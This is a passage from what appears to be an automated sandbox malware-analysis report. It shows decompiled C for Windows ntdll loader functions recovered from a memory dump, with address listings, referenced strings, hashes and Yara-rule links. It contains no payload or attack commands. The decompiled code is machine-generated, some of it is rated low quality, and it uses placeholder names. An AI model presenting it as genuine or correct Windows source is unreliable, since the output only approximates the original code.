					_v8 = _t280;
					goto L16;
				}
			}










































                                                                          0x01183d3c
                                                                          0x01183d42
                                                                          0x01183d44
                                                                          0x01183d46
                                                                          0x01183d49
                                                                          0x01183d4c
                                                                          0x01183d4f
                                                                          0x01183d52
                                                                          0x01183d55
                                                                          0x01183d58
                                                                          0x01183d5b
                                                                          0x01183d5f
                                                                          0x01183d61
                                                                          0x01183d66
                                                                          0x011d8213
                                                                          0x011d8218
                                                                          0x01184085
                                                                          0x01184088
                                                                          0x0118408e
                                                                          0x01184094
                                                                          0x0118409a
                                                                          0x011840a0
                                                                          0x011840a6
                                                                          0x011840a9
                                                                          0x011840af
                                                                          0x011840b6
                                                                          0x011840bd
                                                                          0x011840bd
                                                                          0x01183d83
                                                                          0x011d821f
                                                                          0x011d8229
                                                                          0x011d8238
                                                                          0x011d8238
                                                                          0x011d823d
                                                                          0x011d823d
                                                                          0x01183da0
                                                                          0x01183daf
                                                                          0x01183db5
                                                                          0x01183dba
                                                                          0x01183dba
                                                                          0x01183dd4
                                                                          0x01183e94
                                                                          0x01183eab
                                                                          0x01183f6d
                                                                          0x01183f84
                                                                          0x0118406b
                                                                          0x0118406b
                                                                          0x0118406e
                                                                          0x0118406e
                                                                          0x01184070
                                                                          0x01184074
                                                                          0x011d8351
                                                                          0x011d8351
                                                                          0x0118407a
                                                                          0x0118407f
                                                                          0x011d835d
                                                                          0x011d8370
                                                                          0x011d8377
                                                                          0x011d8379
                                                                          0x011d837c
                                                                          0x011d837c
                                                                          0x011d835d
                                                                          0x00000000
                                                                          0x0118407f
                                                                          0x01183f8a
                                                                          0x01183f8d
                                                                          0x01183f90
                                                                          0x01183f95
                                                                          0x011d830d
                                                                          0x011d830f
                                                                          0x01183f9b
                                                                          0x01183fac
                                                                          0x01183fae
                                                                          0x01183fb1
                                                                          0x01183fb1
                                                                          0x01183fb6
                                                                          0x011d8317
                                                                          0x011d831a
                                                                          0x00000000
                                                                          0x01183fbc
                                                                          0x01183fc1
                                                                          0x01183fc9
                                                                          0x01183fd7
                                                                          0x01183fda
                                                                          0x01183fdd
                                                                          0x01184021
                                                                          0x01184021
                                                                          0x01184029
                                                                          0x01184030
                                                                          0x01184044
                                                                          0x01184046
                                                                          0x01184046
                                                                          0x01184044
                                                                          0x01184049
                                                                          0x011d8327
                                                                          0x011d8334
                                                                          0x011d8339
                                                                          0x011d833c
                                                                          0x0118404f
                                                                          0x0118404f
                                                                          0x0118404f
                                                                          0x01184051
                                                                          0x01184056
                                                                          0x01184063
                                                                          0x01184063
                                                                          0x01184068
                                                                          0x00000000
                                                                          0x01184068
                                                                          0x01183fdf
                                                                          0x01183fe2
                                                                          0x01183fe4
                                                                          0x01183fe7
                                                                          0x01183fef
                                                                          0x01184003
                                                                          0x01184005
                                                                          0x01184005
                                                                          0x0118400c
                                                                          0x01184013
                                                                          0x01184016
                                                                          0x01184017
                                                                          0x0118401b
                                                                          0x0118401e
                                                                          0x00000000
                                                                          0x0118401e
                                                                          0x01183fb6
                                                                          0x01183eb1
                                                                          0x01183eb4
                                                                          0x01183eb7
                                                                          0x01183ebc
                                                                          0x011d82a9
                                                                          0x011d82ab
                                                                          0x01183ec2
                                                                          0x01183ed3
                                                                          0x01183ed5
                                                                          0x01183ed8
                                                                          0x01183ed8
                                                                          0x01183edd
                                                                          0x011d82b3
                                                                          0x011d82b6
                                                                          0x00000000
                                                                          0x01183ee3
                                                                          0x01183ee8
                                                                          0x01183eed
                                                                          0x01183ef0
                                                                          0x01183ef3
                                                                          0x01183f02
                                                                          0x01183f05
                                                                          0x01183f08
                                                                          0x011d82c0
                                                                          0x011d82c3
                                                                          0x011d82c5
                                                                          0x011d82c8
                                                                          0x011d82d0
                                                                          0x011d82e4
                                                                          0x011d82e6
                                                                          0x011d82e6
                                                                          0x011d82ed
                                                                          0x011d82f4
                                                                          0x011d82f7
                                                                          0x011d82f8
                                                                          0x011d82fc
                                                                          0x011d82ff
                                                                          0x011d82ff
                                                                          0x01183f0e
                                                                          0x01183f11
                                                                          0x01183f16
                                                                          0x01183f1d
                                                                          0x01183f31
                                                                          0x011d8307
                                                                          0x011d8307
                                                                          0x01183f31
                                                                          0x01183f39
                                                                          0x01183f48
                                                                          0x01183f4d
                                                                          0x01183f50
                                                                          0x01183f50
                                                                          0x01183f53
                                                                          0x01183f58
                                                                          0x01183f65
                                                                          0x01183f65
                                                                          0x01183f6a
                                                                          0x00000000
                                                                          0x01183f6a
                                                                          0x01183edd
                                                                          0x01183dda
                                                                          0x01183ddd
                                                                          0x01183de0
                                                                          0x01183de5
                                                                          0x011d8245
                                                                          0x01183deb
                                                                          0x01183df7
                                                                          0x01183dfc
                                                                          0x01183dfe
                                                                          0x01183e01
                                                                          0x01183e01
                                                                          0x01183e06
                                                                          0x011d824d
                                                                          0x011d824f
                                                                          0x011d8254
                                                                          0x00000000
                                                                          0x01183e0c
                                                                          0x01183e11
                                                                          0x01183e16
                                                                          0x01183e19
                                                                          0x01183e29
                                                                          0x01183e2c
                                                                          0x01183e2f
                                                                          0x011d825c
                                                                          0x011d825f
                                                                          0x011d8261
                                                                          0x011d8264
                                                                          0x011d826c
                                                                          0x011d8280
                                                                          0x011d8282
                                                                          0x011d8282
                                                                          0x011d8289
                                                                          0x011d8290
                                                                          0x011d8293
                                                                          0x011d8294
                                                                          0x011d8298
                                                                          0x011d829b
                                                                          0x011d829b
                                                                          0x01183e35
                                                                          0x01183e38
                                                                          0x01183e3d
                                                                          0x01183e44
                                                                          0x01183e58
                                                                          0x011d82a3
                                                                          0x011d82a3
                                                                          0x01183e58
                                                                          0x01183e60
                                                                          0x01183e6f
                                                                          0x01183e74
                                                                          0x01183e77
                                                                          0x01183e77
                                                                          0x01183e7a
                                                                          0x01183e7f
                                                                          0x01183e8c
                                                                          0x01183e8c
                                                                          0x01183e91
                                                                          0x00000000
                                                                          0x01183e91

                                                                          Strings
                                                                          • Kernel-MUI-Number-Allowed, xrefs: 01183D8C
                                                                          • Kernel-MUI-Language-Allowed, xrefs: 01183DC0
                                                                          • WindowsExcludedProcs, xrefs: 01183D6F
                                                                          • Kernel-MUI-Language-SKU, xrefs: 01183F70
                                                                          • Kernel-MUI-Language-Disallowed, xrefs: 01183E97
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                          • API String ID: 0-258546922
                                                                          • Opcode ID: be320ad32d354960f9c20b79004ea3601f3403057979a5c17ca0743cc68b8bb8
                                                                          • Instruction ID: 89e7ef7333000c11cb22416775999596fc3fc6dfeafb88430ae4813ee4dbebd1
                                                                          • Opcode Fuzzy Hash: be320ad32d354960f9c20b79004ea3601f3403057979a5c17ca0743cc68b8bb8
                                                                          • Instruction Fuzzy Hash: 1DF18F72D10619EFCF19EF98C980AEEBBB8FF18650F15405AE915A7650E7349E01CFA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011A8E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 44%
                                                                          			E011A8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x126d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1268464; // 0x76d30110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1265780 & 0x00000003) != 0) {
							E011F5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1265780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E011BB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1267984; // 0xd02c18
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1268464; // 0x76d30110
					 *0x126b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E011A9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1265780 & 0x00000005) != 0) {
						_push(_t49);
						E011F5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                          0x011a8e0f
                                                                          0x011a8e16
                                                                          0x011a8e19
                                                                          0x011a8e1b
                                                                          0x011a8e21
                                                                          0x011a8e7f
                                                                          0x011a8e85
                                                                          0x011e9354
                                                                          0x011e936c
                                                                          0x011e9371
                                                                          0x011e937b
                                                                          0x011e9381
                                                                          0x011e9381
                                                                          0x011e937b
                                                                          0x011a8e9d
                                                                          0x011a8e9d
                                                                          0x011a8e29
                                                                          0x011a8e2c
                                                                          0x011a8e38
                                                                          0x011a8e3e
                                                                          0x011a8e43
                                                                          0x011a8eb5
                                                                          0x011a8eb9
                                                                          0x011e92aa
                                                                          0x011e92af
                                                                          0x011e92e8
                                                                          0x011e92e8
                                                                          0x011e92af
                                                                          0x011a8eb9
                                                                          0x011a8e45
                                                                          0x011a8e53
                                                                          0x011a8e5b
                                                                          0x011a8e5f
                                                                          0x011a8e78
                                                                          0x011a8e78
                                                                          0x011a8e7d
                                                                          0x011a8ec3
                                                                          0x011a8ecd
                                                                          0x011a8ed2
                                                                          0x011a8ed2
                                                                          0x011a8ec5
                                                                          0x011a8ec5
                                                                          0x00000000
                                                                          0x011a8e7d
                                                                          0x011a8e67
                                                                          0x011a8ea4
                                                                          0x011e931a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011e9320
                                                                          0x011a8ea4
                                                                          0x011a8e70
                                                                          0x011e9325
                                                                          0x011e9340
                                                                          0x011e9345
                                                                          0x011e9345
                                                                          0x011a8e76
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000

                                                                          Strings
                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 011E932A
                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 011E933B, 011E9367
                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 011E9357
                                                                          • LdrpFindDllActivationContext, xrefs: 011E9331, 011E935D
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                          • API String ID: 0-3779518884
                                                                          • Opcode ID: 53eb26d2a01e1d5b24c622ab4d4c94b39ac6cbac1810a88327e69c2aa6867e0b
                                                                          • Instruction ID: dc43ec089b53d49384cfa71c6c6596a534c0c91ccb7c3ab7486f44892573e503
                                                                          • Opcode Fuzzy Hash: 53eb26d2a01e1d5b24c622ab4d4c94b39ac6cbac1810a88327e69c2aa6867e0b
                                                                          • Instruction Fuzzy Hash: 60411A39A00335DFDB3EAB5C984CB75BFA5AB0024AF868179EB14571A2E7745D8087C1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01188794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 83%
                                                                          			E01188794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0118934A() != 0) {
								_t159 = E011FA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1265780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E011F5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1265780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0118849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01188999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01188999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1265c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1265c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01192280(_t92, 0x12686cc);
															_t94 = E01249DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E011A61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1265c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01188A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1265c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1265c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E011BF380(_t136, 0x1151184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01192280(_t108, 0x12686cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E011A61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01249D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0118FFB0(_t118, _t156, 0x12686cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E011B9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                          0x01188799
                                                                          0x0118879d
                                                                          0x011887a1
                                                                          0x011887a3
                                                                          0x011887a8
                                                                          0x011887c3
                                                                          0x011887c3
                                                                          0x011887c8
                                                                          0x011887d1
                                                                          0x011887d4
                                                                          0x011887d8
                                                                          0x011887e5
                                                                          0x011887ec
                                                                          0x011d9bfe
                                                                          0x011d9c00
                                                                          0x011d9c02
                                                                          0x011d9c08
                                                                          0x011d9c0d
                                                                          0x011d9c0f
                                                                          0x011d9c14
                                                                          0x011d9c2d
                                                                          0x011d9c32
                                                                          0x011d9c37
                                                                          0x011d9c3a
                                                                          0x011d9c3c
                                                                          0x011d9c42
                                                                          0x011d9c42
                                                                          0x011d9c3c
                                                                          0x011d9c02
                                                                          0x011887da
                                                                          0x011887df
                                                                          0x011887e3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011887e3
                                                                          0x011887f2
                                                                          0x00000000
                                                                          0x011887fb
                                                                          0x011887fd
                                                                          0x011887fe
                                                                          0x0118880e
                                                                          0x0118880f
                                                                          0x01188810
                                                                          0x01188814
                                                                          0x0118881a
                                                                          0x0118881c
                                                                          0x0118881f
                                                                          0x01188821
                                                                          0x01188822
                                                                          0x01188824
                                                                          0x01188826
                                                                          0x0118882c
                                                                          0x0118882e
                                                                          0x011d9c48
                                                                          0x011d9c48
                                                                          0x01188834
                                                                          0x01188834
                                                                          0x01188837
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x01188837
                                                                          0x0118882e
                                                                          0x0118883d
                                                                          0x01188840
                                                                          0x01188843
                                                                          0x01188846
                                                                          0x01188849
                                                                          0x0118884c
                                                                          0x0118884e
                                                                          0x01188850
                                                                          0x01188852
                                                                          0x01188854
                                                                          0x01188857
                                                                          0x011888b4
                                                                          0x011888b6
                                                                          0x011888b6
                                                                          0x01188859
                                                                          0x01188859
                                                                          0x01188859
                                                                          0x01188861
                                                                          0x01188866
                                                                          0x0118886a
                                                                          0x0118893d
                                                                          0x01188941
                                                                          0x00000000
                                                                          0x01188947
                                                                          0x01188947
                                                                          0x0118894a
                                                                          0x0118894c
                                                                          0x00000000
                                                                          0x01188952
                                                                          0x01188955
                                                                          0x0118895a
                                                                          0x0118895d
                                                                          0x0118895d
                                                                          0x0118895f
                                                                          0x01188961
                                                                          0x01188961
                                                                          0x01188968
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0118896a
                                                                          0x0118896b
                                                                          0x0118896e
                                                                          0x00000000
                                                                          0x01188970
                                                                          0x01188970
                                                                          0x01188970
                                                                          0x01188970
                                                                          0x01188972
                                                                          0x01188972
                                                                          0x01188974
                                                                          0x00000000
                                                                          0x0118897a
                                                                          0x0118897a
                                                                          0x0118897d
                                                                          0x00000000
                                                                          0x01188983
                                                                          0x011d9c65
                                                                          0x011d9c6d
                                                                          0x011d9c72
                                                                          0x011d9c75
                                                                          0x011d9c75
                                                                          0x011d9c82
                                                                          0x011d9c86
                                                                          0x011d9c87
                                                                          0x011d9c88
                                                                          0x011d9c89
                                                                          0x011d9c8c
                                                                          0x011d9c90
                                                                          0x011d9c95
                                                                          0x011d9c97
                                                                          0x011d9ca0
                                                                          0x011d9ca3
                                                                          0x011d9ca9
                                                                          0x011d9ca9
                                                                          0x00000000
                                                                          0x011d9ca9
                                                                          0x011d9ca3
                                                                          0x00000000
                                                                          0x011d9c97
                                                                          0x0118897d
                                                                          0x00000000
                                                                          0x01188974
                                                                          0x01188988
                                                                          0x01188992
                                                                          0x01188996
                                                                          0x00000000
                                                                          0x01188996
                                                                          0x0118894c
                                                                          0x00000000
                                                                          0x01188870
                                                                          0x0118887b
                                                                          0x0118887d
                                                                          0x0118887f
                                                                          0x01188881
                                                                          0x01188884
                                                                          0x01188884
                                                                          0x01188886
                                                                          0x01188889
                                                                          0x0118888c
                                                                          0x0118888e
                                                                          0x01188891
                                                                          0x01188891
                                                                          0x01188898
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0118889a
                                                                          0x0118889b
                                                                          0x0118889e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011888a0
                                                                          0x011888a8
                                                                          0x011888b0
                                                                          0x011888b2
                                                                          0x011888d3
                                                                          0x011888d5
                                                                          0x00000000
                                                                          0x011888d7
                                                                          0x011888db
                                                                          0x011888dc
                                                                          0x011888e0
                                                                          0x011888e8
                                                                          0x011888ee
                                                                          0x011888f0
                                                                          0x011888f3
                                                                          0x011888fc
                                                                          0x01188901
                                                                          0x01188906
                                                                          0x0118890c
                                                                          0x0118890c
                                                                          0x0118890f
                                                                          0x01188916
                                                                          0x01188917
                                                                          0x01188918
                                                                          0x01188919
                                                                          0x0118891a
                                                                          0x0118891f
                                                                          0x01188921
                                                                          0x011d9c52
                                                                          0x011d9c55
                                                                          0x011d9c5b
                                                                          0x011d9cac
                                                                          0x011d9cc0
                                                                          0x011d9cc0
                                                                          0x011d9c55
                                                                          0x01188927
                                                                          0x01188927
                                                                          0x0118892f
                                                                          0x01188933
                                                                          0x00000000
                                                                          0x011888f5
                                                                          0x011888f5
                                                                          0x00000000
                                                                          0x011888f7
                                                                          0x011888f7
                                                                          0x011888fa
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011888fa
                                                                          0x011888f5
                                                                          0x011888f3
                                                                          0x00000000
                                                                          0x011888d5
                                                                          0x00000000
                                                                          0x011888b2
                                                                          0x011888c9
                                                                          0x00000000
                                                                          0x011888c9
                                                                          0x0118887f
                                                                          0x0118886a
                                                                          0x01188857
                                                                          0x01188852
                                                                          0x011888bf
                                                                          0x011888bf
                                                                          0x011887aa
                                                                          0x011887ad
                                                                          0x011887ae
                                                                          0x011887b4
                                                                          0x011887b5
                                                                          0x011887b6
                                                                          0x011887b8
                                                                          0x011887bd
                                                                          0x011887c1
                                                                          0x011887f4
                                                                          0x011887fa
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011887c1
                                                                          0x00000000

                                                                          Strings
                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 011D9C28
                                                                          • LdrpDoPostSnapWork, xrefs: 011D9C1E
                                                                          • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 011D9C18
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                          • API String ID: 2994545307-1948996284
                                                                          • Opcode ID: 4f2ae885d49e72024fac4ee5092fa05c87c6fc4e52cee83200f1862539c8590c
                                                                          • Instruction ID: 5cb048a9260d96d90d90fc57c15c7db6a8a43d1590c70b00ba79bcd6a7653dd1
                                                                          • Opcode Fuzzy Hash: 4f2ae885d49e72024fac4ee5092fa05c87c6fc4e52cee83200f1862539c8590c
                                                                          • Instruction Fuzzy Hash: 83911631A1020ADFDF1CEF59D480ABAB7B5FF85314B958169DA05AB251E730ED01CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01187E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 98%
                                                                          			E01187E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0118CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0117C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1265780; // 0x0
						if((_t102 & 0x00000003) != 0) {
